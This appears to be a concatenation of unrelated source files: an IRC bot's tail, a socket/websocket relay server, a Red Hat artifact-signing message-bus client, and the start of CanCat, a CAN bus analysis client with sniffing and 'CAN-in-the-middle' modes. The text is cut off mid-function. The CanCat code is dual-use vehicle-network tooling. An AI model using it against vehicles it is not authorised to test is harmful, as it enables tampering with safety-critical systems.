        if msg == '!stop':
            if not self.running():
                return
            self.stop()
            # Busy-wait until the listener loop notices the stop flag.
            while self.running():
                ''' Waiting for event listen loop to to terminate'''
                pass
            self.msg(channel, 'Stopped ISEA!')
            return
        elif msg == '!start':
            if self.running():
                self.msg(channel, 'ISEA is already running!')
                return
            else:
                self.start()
                self.msg(config['irc']['channel'], 'Started ISEA!')
                return
        elif msg == '!reload':
            self.msg(channel, 'Reloading ISEA!')
            self.stop()
            while self.running():
                pass
            self.start()
            self.msg(channel, 'Reloaded ISEA!')
            return
        # Check to see if they're sending me a private message
        if channel == self.nickname:
            msg = "It isn't nice to whisper! Play nice with the group."
            self.msg(user, msg)
            return
        # Otherwise check to see if it is a message directed at me
        if msg.startswith(self.nickname + ":"):
            msg = "%s: I am a bot. Why so serious?" % user
            self.msg(channel, msg)

    def action(self, user, channel, msg):
        """This will get called when the bot sees someone do an action (ignored)."""
        pass

    def irc_NICK(self, prefix, params):
        """Called when an IRC user changes their nickname (ignored)."""
        pass

    def alert(self, msg):
        """Send an alert message to the configured channel.

        Fixed: was self.IRCClient.msg(...) -- instances have no `IRCClient`
        attribute; msg() is inherited directly from irc.IRCClient.
        """
        self.msg(config['irc']['channel'], msg)
class LogBotFactory(protocol.ClientFactory):
    """A factory for LogBots.
    A new protocol instance will be created each time we connect to the server.
    """
    # the class of the protocol to build when new connection is made
    protocol = ircProtocol
    #def __init__(self), channel):
    #    self.channel = channel
    #
    def clientConnectionLost(self, connector, reason):
        """If we get disconnected, reconnect to server."""
        connector.connect()
    def clientConnectionFailed(self, connector, reason):
        # Hard connection failure (e.g. refused): report and stop the reactor.
        # (Python 2 print statement -- this file targets Python 2.)
        print "connection failed:", reason
        reactor.stop()
# Build the twisted application: a persistent TCP client running the IRC bot.
application = service.Application("saltbot")
ircf = LogBotFactory()
# NOTE(review): this rebinds the name `irc`, shadowing the twisted `irc`
# module imported above (already consumed at class-definition time, so
# harmless today -- but confirm nothing below expects the module).
irc = internet.TCPClient(config['irc']['server'], config['irc']['port'], ircf)
irc.setName('irc')
irc.setServiceParent(application)
|
transfer.py | import socket
import threading
from .WebSocket.WebSocket import WebSocket
from Config import config
ADDRESS = config.Project.server_host
PORT = config.Project.port
ALLOW = config.Project.allow_host
def broadcast(message):
    """Fan `message` out to every currently registered receiver."""
    for rcv in receivers:
        rcv.send(message)
def handleSend(client):
    """Relay loop for a sending client.

    Blocks reading raw data from `client` and broadcasts the decoded text to
    every receiver.  On disconnect or error the socket is closed and the
    closure is announced to all receivers.
    """
    while True:
        try:  # receiving valid messages from client
            data = client.recv(1024)
            if not data:
                # Orderly shutdown: recv() returns b'' forever once the peer
                # closes, which previously spun this loop broadcasting empty
                # strings.  Route it through the common cleanup path instead.
                raise ConnectionResetError('client closed connection')
            broadcast(data.decode())
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are not swallowed; cleanup behavior is unchanged.
            client.close()
            print("====== Send Close ======")
            broadcast('Send Closed')
            break
def handleReceive(Receiver):
    """Keep-alive loop for one websocket receiver.

    Re-broadcasts every raw frame the receiver sends; on disconnect or error
    the receiver is unregistered, its socket closed, and the closure is
    announced to the remaining receivers.
    """
    while True:
        try:  # receiving valid messages from client
            frame = Receiver.client.recv(1024)
            if not frame:
                # b'' means the peer closed; previously this re-broadcast
                # empty frames in a tight loop.  Fail into the cleanup path.
                raise ConnectionResetError('receiver closed connection')
            broadcast(frame)
        except Exception:  # removing receivers
            # Narrowed from a bare `except:` so interpreter-exit signals are
            # not swallowed; cleanup behavior is unchanged.
            receivers.remove(Receiver)
            Receiver.client.close()
            print("====== Receive Close ======")
            broadcast('Receive Closed')
            break
def transfer(): # accepting multiple receivers
    # Single-threaded accept loop: each connection is classified as a
    # websocket receiver (HTTP upgrade request) or a raw sender, and each
    # gets its own relay thread.
    ADDRESS = config.Project.server_host
    global receivers
    # Shared list of connected websocket receivers; mutated by the
    # handleReceive threads as clients disconnect.
    receivers = []
    print("====== Server {} Start ======".format(PORT))
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # socket initialization
    server.bind((ADDRESS, PORT)) # binding limit and port to socket
    server.listen()
    while True:
        # NOTE(review): rebinds ADDRESS to the peer's (host, port) tuple,
        # shadowing the bind address above -- confirm this is intentional.
        client, ADDRESS = server.accept()
        key = client.recv(1024)
        try:
            value = key.decode()
            print(value)
        except:
            # Non-UTF-8 first packet: log it and fall through as a sender.
            print(f'ERROR MESSAGE: {key}')
            value = ""
        if "GET / HTTP/1.1" in value:
            print("====== Receive Connection Built ======")
            try:
                Receiver = WebSocket(client)
                Receiver.init(key)
            except:
                # Handshake failed; drop this connection, keep serving.
                continue
            try:
                info = client.recv(8096)
            except Exception as e:
                info = "None"
            # First websocket frame is consumed and unpacked here but the
            # result (`body`) is never used.
            body = Receiver.unpackage(info)
            #send_msg(client, "OK".encode())
            Receiver.send('Success')
            receivers.append(Receiver)
            broadcast("Connect Receive Server Success")
            Receive_Thread = threading.Thread(target=handleReceive, args=(Receiver,))
            Receive_Thread.start()
            continue
        else:
            print("====== Send Connection Built ======")
            broadcast("Connect Send Server Success")
            client.send('Success'.encode())
            Send_Thread = threading.Thread(target=handleSend, args=(client,))
            Send_Thread.start()
umb_producer.py | #!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker01.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker02.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker01.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker02.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker01.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker02.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker01.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker02.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
    """Determine the quay destination tag where a release image lives, based on the
    release name and arch (since we can now have multiple arches for each release name)
    - make sure it includes the arch in the tag to distinguish from any other releases of same name.
    e.g.:
        (4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
        (4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
    """
    # Arch already embedded in the name (arch-specific nightlies): use as-is.
    if arch in release_name:
        return release_name
    return "{}-{}".format(release_name, arch)
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
# Reusable click option decorators shared by the sub-commands below, so the
# global group does not need 'required' options of its own.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
                         help="The user who requested the signature")
product = click.option("--product", required=True,
                       type=click.Choice(["openshift", "rhcos"]),
                       help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
                          help="Unique build job identifier for this signing request, "
                          "use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
                           type=click.Choice(['test', 'redhatrelease2', 'beta2']),
                           help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
                                help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
                        type=click.Choice(['x86_64', 'ppc64le', 's390x']),
                        help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
                           type=click.Choice(['ocp', 'ocp-dev-preview']),
                           help="What type of client needs to be signed")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
                           type=click.Path(exists=True),
                           help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
                          type=click.Path(exists=True),
                          help="Path to the client key for UMB authentication")
# NOTE(review): module-level `env` is this decorator object; consumer_thread
# below formats it into the consumer address as if it were the string value.
env = click.option("--env", required=False, metavar="ENVIRONMENT",
                   default='stage',
                   type=click.Choice(['dev', 'stage', 'prod']),
                   help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
                    help="If given, DO NOT request signature, "
                    "show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
                        default=DEFAULT_CA_CHAIN,
                        help="Manually specify the path to the RHIT CA Trust Chain. "
                        "Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
@click.group(context_settings=context_settings)
def cli(**kwargs):
    """Helper utility for internal Red Hat use ONLY. Use in a build job to
    request signatures for various artifacts produced as part of an
    Openshift 4.x release. Signatures are requested by sending a JSON blob
    over the Universal Message Bus to the 'robosignatory' (RADAS).

    You may override the default path to look for the Red Hat IT
    Certificate Authority trust chain by using the --ca-certs option in
    the global context (before the sub-command).
    """
    # Group-level entry point; all real work happens in the sub-commands.
    pass
######################################################################
# Helpers
def get_digest_base64(location):
    """Download the sha256sum.txt message digest file at the given
    `location`.

    :return: A `string` of the base64-encoded message digest
    :raises Exception: with the HTTP reason on any non-200 response
    """
    res = requests.get(location,
                       verify=ssl.get_default_verify_paths().openssl_cafile)
    if res.status_code != 200:
        raise Exception(res.reason)
    # b64encode needs bytes, so encode the text first; the b64 result is
    # bytes too, so decode back to str for later JSON serialization.
    return base64.b64encode(res.text.encode()).decode()
def presend_validation(message):
    """Verify `message` carries every required signing field.

    Returns True when complete, otherwise the name of the first missing
    field (callers compare the result with `is True`).
    """
    missing = [f for f in SIGN_REQUEST_MESSAGE_FIELDS if f not in message]
    if missing:
        return missing[0]
    return True
def oc_image_info(pullspec):
    """Get metadata for an image at the given `pullspec`.

    :return: a dict with the serialized JSON from the 'oc image info' call
    """
    cmd = ['oc', 'image', 'info', '-o', 'json', pullspec]
    return json.loads(subprocess.check_output(cmd))
def get_bus_producer(env, certificate, private_key, trusted_certificates):
    """Build an AMQProducer aimed at TOPIC for the given environment.

    Centralized so every caller constructs producers identically;
    a falsy `env` falls back to 'stage'.
    """
    settings = dict(urls=URLS[env or 'stage'],
                    certificate=certificate,
                    private_key=private_key,
                    trusted_certificates=trusted_certificates,
                    topic=TOPIC)
    return AMQProducer(**settings)
def producer_thread(producer, args):
    # Thread target: echo the outgoing payload for operator visibility,
    # then publish it on the bus via the producer.
    print(args)
    producer.send_msg(*args)
def producer_send_msg(producer, *args):
    """Publish synchronously: run producer_thread on a worker and wait for it."""
    sender = threading.Thread(target=producer_thread, args=(producer, args))
    sender.start()
    sender.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
    """Build an AMQConsumer for the given environment.

    Centralized so every caller constructs consumers identically;
    a falsy `env` falls back to 'stage'.
    """
    settings = dict(urls=URLS[env or 'stage'],
                    certificate=certificate,
                    private_key=private_key,
                    trusted_certificates=trusted_certificates)
    return AMQConsumer(**settings)
def art_consumer_callback(msg, notsure):
    """`msg` is a `Message` object which has various attributes. Such as `body`.
    `notsure` I am not sure what that is. I only got as far as knowing
    this callback requires two parameters.

    Writes the signed artifact to disk (named after artifact_meta.name) and
    returns True on success.
    """
    print(msg)
    body = json.loads(msg.body)
    print(json.dumps(body, indent=4))
    if body['msg']['signing_status'] != 'success':
        print("ERROR: robosignatory failed to sign artifact")
        # NOTE(review): this runs on the consumer thread; exit() raises
        # SystemExit which only ends that thread, not the whole process --
        # confirm the intended abort semantics.
        exit(1)
    else:
        # example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
        result = body['msg']['signed_artifact']
        out_file = body['msg']['artifact_meta']['name']
        with open(out_file, 'w') as fp:
            # base64.decodestring is Python-2 era API (removed in py3.9);
            # this script's shebang targets python2, where it is valid.
            fp.write(base64.decodestring(result))
            fp.flush()
        print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
        return True
def consumer_thread(consumer):
    # NOTE(review): `env` here resolves to the module-level name, which is the
    # click.option decorator object, NOT the --env string value -- the
    # formatted consumer address is almost certainly wrong.  Fixing it needs
    # the chosen environment plumbed through as a parameter; confirm upstream.
    consumer.consume(ART_CONSUMER.format(env=env), art_consumer_callback)
def consumer_start(consumer):
    """Run the consumer loop on a background thread and return the Thread."""
    worker = threading.Thread(target=consumer_thread, args=(consumer,))
    worker.start()
    return worker
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
    """Build the matched (producer, consumer) pair for one environment."""
    creds = (env, certificate, private_key, trusted_certificates)
    return (get_bus_producer(*creds), get_bus_consumer(*creds))
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
                   release_name, client_cert, client_key, client_type, env, noop,
                   ca_certs, arch):
    """Sign a 'message digest'. These are sha256sum.txt files produced by
    the 'sha256sum` command (hence the strange command name). In the ART
    world, this is for signing message digests from extracting OpenShift
    tools, as well as RHCOS bare-metal message digests.
    """
    # Both branches are guaranteed by click.Choice(["openshift", "rhcos"]);
    # any other value would leave artifact_url unbound.
    if product == 'openshift':
        artifact_url = MESSAGE_DIGESTS[product].format(
            arch=arch,
            release_name=release_name,
            release_stage=client_type)
    elif product == 'rhcos':
        # rhcos URLs embed the x.y release directory as well as the full name.
        release_parts = release_name.split('.')
        artifact_url = MESSAGE_DIGESTS[product].format(
            arch=arch,
            release_name_xy='.'.join(release_parts[:2]),
            release_name=release_name)
    artifact = get_digest_base64(artifact_url)
    message = {
        "artifact": artifact,
        "artifact_meta": {
            "product": product,
            "release_name": release_name,
            "name": "sha256sum.txt.gpg",
            "type": "message-digest",
        },
        "request_id": request_id,
        "requestor": requestor,
        "sig_keyname": sig_keyname,
    }
    validated = presend_validation(message)
    if validated is True:
        print("Message contains all required fields")
        to_send = json.dumps(message)
    else:
        print("Message missing required field: {}".format(validated))
        exit(1)
    if noop:
        print("Message we would have sent over the bus:")
        print(to_send)
    else:
        producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
        # NOTE(review): local `consumer_thread` shadows the module-level
        # function of the same name -- harmless here, but confusing.
        consumer_thread = consumer_start(consumer)
        producer_send_msg(producer, {}, to_send)
        print("Message we sent over the bus:")
        print(to_send)
        print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
        print("Waiting for consumer to receive data back from request")
        consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
                release_name, client_cert, client_key, client_type, env, noop,
                ca_certs, digest, arch):
    """Sign a 'json digest'. These are JSON blobs that associate a
    pullspec with a sha256 digest. In the ART world, this is for "signing
    payload images". After the json digest is signed we publish the
    signature in a location which follows a specific directory pattern,
    thus allowing the signature to be looked up programmatically.
    """
    # Skeleton of the atomic container signature claim; the two None slots
    # are filled in below.
    json_claim = {
        "critical": {
            "image": {
                "docker-manifest-digest": None
            },
            "type": "atomic container signature",
            "identity": {
                "docker-reference": None,
            }
        },
        "optional": {
            "creator": "Red Hat OpenShift Signing Authority 0.0.1",
        },
    }
    release_stage = "ocp-release-nightly" if client_type == 'ocp-dev-preview' else "ocp-release"
    release_tag = get_release_tag(release_name, arch)
    pullspec = "quay.io/openshift-release-dev/{}:{}".format(release_stage, release_tag)
    json_claim['critical']['identity']['docker-reference'] = pullspec
    # If no digest was supplied, look it up live via `oc image info`.
    if not digest:
        digest = oc_image_info(pullspec)['digest']
    json_claim['critical']['image']['docker-manifest-digest'] = digest
    print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
    print(json.dumps(json_claim, indent=4))
    message = {
        "artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
        "artifact_meta": {
            "product": product,
            "release_name": release_name,
            # ':' is not filesystem/url friendly; the signed file is named
            # after the digest with ':' replaced by '='.
            "name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
            "type": "json-digest",
        },
        "request_id": request_id,
        "requestor": requestor,
        "sig_keyname": sig_keyname,
    }
    validated = presend_validation(message)
    if validated is True:
        print("Message contains all required fields")
        to_send = json.dumps(message)
    else:
        print("Message missing required field: {}".format(validated))
        exit(1)
    if noop:
        print("Message we would have sent over the bus:")
        print(to_send)
    else:
        producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
        # NOTE(review): local `consumer_thread` shadows the module-level
        # function of the same name -- harmless here, but confusing.
        consumer_thread = consumer_start(consumer)
        producer_send_msg(producer, {}, to_send)
        print("Message we sent over the bus:")
        print(to_send)
        print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
        print("Waiting for consumer to receive data back from request")
        consumer_thread.join()
######################################################################
# Script entry point: dispatch to the click command group.
if __name__ == '__main__':
    cli()
|
__init__.py | from __future__ import print_function
from past.builtins import xrange
from builtins import input, bytes
import six
import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import math
import pickle
import binascii
from cancat import iso_tp
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PRINT_CAN_REGS = 0x3C
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP_') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
TIMING_SEARCH = 3
# constants for VIEW settings:
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
GM_messages = {
}
Ford_messages = {
}
Chrysler_messages = {
}
Toyota_messages = {
}
Honda_messages = {
}
VW_messages = {
}
Nissan_messages = {
}
Mitsubishi_messages = {
}
Hyundai_messages = {
}
Kia_messages = {
}
Suzuki_messages = {
}
Harley_messages = {
}
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
    # Default CMD_LOG handler: print the payload's repr.  When dispatched from
    # _rxtx, `message` is the (timestamp, bytes) tuple; `canbuf` is the
    # CanInterface instance (unused here).
    print('LOG: %s' % repr(message))
def handleLogHexToScreen(message, canbuf):
    """Default CMD_LOG_HEX handler: print a 4-byte little-endian unsigned
    int from `message` in hex.  `canbuf` is the CanInterface (unused).
    """
    # Explicit single-element unpack.  The old code formatted the whole
    # unpack() tuple with '%x', which only worked by accident because it was
    # a 1-tuple.
    (num,) = struct.unpack("<L", message)
    print('LOG: %x' % num)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
    """File an incoming CAN message into the interface's mailbox and echo it.

    With `arbids` set, only messages whose arbitration id is in that
    collection are printed; everything is filed regardless.
    """
    ts = time.time()
    idx = canbuf._submitMessage(CMD_CAN_RECV, (ts, message))
    arbid, data = canbuf._splitCanMsg(message)
    # Print when no filter is given, or when the id passes the filter.
    if not arbids or arbid in arbids:
        print(reprCanMsg(idx, ts, arbid, data))
# Default mapping of transceiver command byte -> handler.  Commands without
# an entry here are filed into per-command mailboxes by _rxtx instead.
default_cmdhandlers = {
    CMD_LOG : handleLogToScreen,
    CMD_LOG_HEX: handleLogHexToScreen,
    }
def loadCanBuffer(filename):
    """Unpickle and return a saved CAN session from `filename`.

    Fixed: the file is now opened in binary mode (required for pickle data
    on Python 3) and closed deterministically instead of being leaked.
    """
    with open(filename, 'rb') as f:
        return pickle.load(f)
def keystop(delay=0):
    """Return truthy if keyboard/stdin input is waiting, polling for up to
    `delay` seconds (POSIX) or instantaneously (Windows).
    """
    if os.name == 'posix':
        return len(select.select([sys.stdin],[],[],delay)[0])
    else:
        # Fixed: msvcrt was never imported anywhere, so this branch raised
        # NameError on Windows.  Imported lazily because the module only
        # exists there.
        import msvcrt
        return msvcrt.kbhit()
class SPECIAL_CASE(object):
    """Marker type used to build sentinel values distinct from real data."""
    pass
# Sentinel alias -- presumably returned by message-rendering callbacks to
# suppress output (TODO confirm against its users elsewhere in this module).
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface(object):
_msg_source_idx = CMD_CAN_RECV
def __init__(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
'''
CAN Analysis Workspace
This can be subclassed by vendor to allow more vendor-specific code
based on the way each vendor uses the varios Buses
'''
if orig_iface != None:
self._consumeInterface(orig_iface)
return
self.init(port, baud, verbose, cmdhandlers, comment, load_filename, orig_iface, max_msgs)
    def init(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
        # Full state initialization: buffers, mailboxes, config mirror,
        # optional session load, device discovery/connect, rx thread start.
        self._inbuf = b''
        self._trash = []
        self._messages = {}
        self._msg_events = {}
        self._queuelock = threading.Lock()
        self._config = {}
        self._config['shutdown'] = False
        self._config['go'] = False
        self._max_msgs = self._config['max_msgs'] = max_msgs
        self.verbose = self._config['verbose'] = verbose
        self.port = self._config['port'] = port
        self._baud = self._config['baud'] = baud
        self.name = self._config['name'] = 'CanCat'
        self._io = None
        self._in_lock = None
        self._out_lock = None
        self._commsthread = None
        self._last_can_msg = None
        self.bookmarks = []
        self.bookmark_info = {}
        self.comments = []
        if cmdhandlers == None:
            cmdhandlers = default_cmdhandlers
        self._cmdhandlers = cmdhandlers
        if load_filename != None:
            self.loadFromFile(load_filename)
        #### FIXME: make this a connection cycle, not just a "pick the first one" thing...
        #### Prove that it's a CanCat... and that it's not in use by something else...
        # If we specify a file and no port, assume we just want to read the file, only try to guess
        # ports if there is no file specified
        if self.port == None and load_filename == None:
            self.port = getDeviceFile()
        # No filename, can't guess the port, whatcha gonna do?
        if self.port == None and load_filename == None:
            raise Exception("Cannot find device, and no filename specified. Please try again.")
        if self.port != None:
            self._reconnect()
        # just start the receive thread, it's lightweight and you never know when you may want it.
        self._startRxThread()
        self._config['go'] = True
def _startRxThread(self):
self._commsthread = threading.Thread(target=self._rxtx)
self._commsthread.setDaemon(True)
self._commsthread.start()
    def register_handler(self, cmd, handler):
        # Route incoming messages with command byte `cmd` to `handler`
        # (invoked as handler((timestamp, message), self) by _rxtx) instead
        # of filing them into the mailbox.
        self._cmdhandlers[cmd] = handler
    def remove_handler(self, cmd):
        # Setting the entry to None (rather than deleting it) is equivalent
        # here: _rxtx treats a None handler as "no handler" and files the
        # message into the mailbox.
        self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
other._config['go'] = False
for k,v in vars(other).items():
setattr(self, k, v)
if other._commsthread != None:
self._startRxThread()
    def _reconnect(self, port=None, baud=None):
        '''
        Attempt to connect/reconnect to the CanCat Transceiver
        '''
        if self.port == None and port == None:
            print("cannot connect to an unspecified port")
            return
        if self._io != None:
            self._io.close()
        # SHIM to allow us to easily specify a Fake CanCat for testing
        if self.port == 'FakeCanCat':
            import cancat.test as testcat
            self._io = testcat.FakeCanCat()
        else:
            self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True, timeout=None)
            self._io.setDTR(True)
        # clear all locks and free anything waiting for them
        # (release repeatedly in case multiple waiters are queued, then
        # install a fresh Lock object)
        if self._in_lock != None:
            while self._in_lock.locked_lock():
                self._in_lock.release()
                time.sleep(.01)
        self._in_lock = threading.Lock()
        if self._out_lock != None:
            while self._out_lock.locked_lock():
                self._out_lock.release()
                time.sleep(.01)
        self._out_lock = threading.Lock()
        # give the device a moment to settle after DTR toggling
        time.sleep(1)
        return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if self._io and isinstance(self._io, serial.Serial):
print("shutting down serial connection")
self._io.close()
self._config['shutdown'] = True
if self._commsthread != None:
self._commsthread.wait()
def clearCanMsgs(self):
'''
Clear out all messages currently received on the CAN bus, allowing for
basically a new analysis session without creating a new object/connection
returns a list of the messages
'''
allmsgs = self.recvall(CMD_CAN_RECV)
# Clear the bookmarks as well because they are no longer meaningful
self.bookmarks = []
self.bookmark_info = {}
return allmsgs
    def _rxtx(self):
        '''
        Receiver thread runner. Internal use only.
        Processes data from the CanCat transceiver, parses and places messages
        into correct mailboxes and/or hands off to pre-configured handlers.

        Wire format: '@' <size> <cmd> <payload...> where <size> counts
        cmd+payload.  Runs a small state machine: SYNC (find '@'),
        GO (consume one packet), DISCONN (attempt reconnect).
        '''
        self._rxtx_state = RXTX_SYNC
        while not self._config['shutdown']:
            try:
                # paused: spin slowly until go is set
                if not self._config['go']:
                    time.sleep(.4)
                    continue
                if self.verbose > 4:
                    if self.verbose > 5:
                        print("STATE: %s" % self._rxtx_state)
                    else:
                        sys.stderr.write('.')
                # try to reconnect to disconnected unit (FIXME: not working right yet)
                if self._rxtx_state == RXTX_DISCONN:
                    print("FIXME: reconnect disconnected serial port...")
                    time.sleep(1)
                    self._reconnect()
                    self._rxtx_state = RXTX_SYNC
                    continue
                # fill the queue ##########################################
                self._in_lock.acquire()
                try:
                    char = self._io.read()
                except serial.serialutil.SerialException as e:
                    self.errorcode = e
                    self.log("serial exception")
                    if "disconnected" in e.message:
                        self._io.close()
                        self._rxtx_state = RXTX_DISCONN
                    continue
                finally:
                    if self._in_lock.locked_lock():
                        self._in_lock.release()
                self._inbuf += char
                #self.log("RECV: %s" % repr(self._inbuf), 4)
                ##########################################################
                # FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
                # ====== it would require more locking/synchronizing...
                # make sure we're synced
                if self._rxtx_state == RXTX_SYNC:
                    if self._inbuf.startswith(b'@') != True:
                        # discard leading garbage up to the next '@' marker
                        self._queuelock.acquire()
                        try:
                            idx = self._inbuf.find(b'@')
                            if idx == -1:
                                self.log("sitting on garbage...", 3)
                                continue
                            trash = self._inbuf[:idx]
                            self._trash.append(trash)
                            self._inbuf = self._inbuf[idx:]
                        finally:
                            self._queuelock.release()
                    self._rxtx_state = RXTX_GO
                # handle buffer if we have anything in it
                if self._rxtx_state == RXTX_GO:
                    # need at least '@' + size + cmd before parsing
                    if len(self._inbuf) < 3: continue
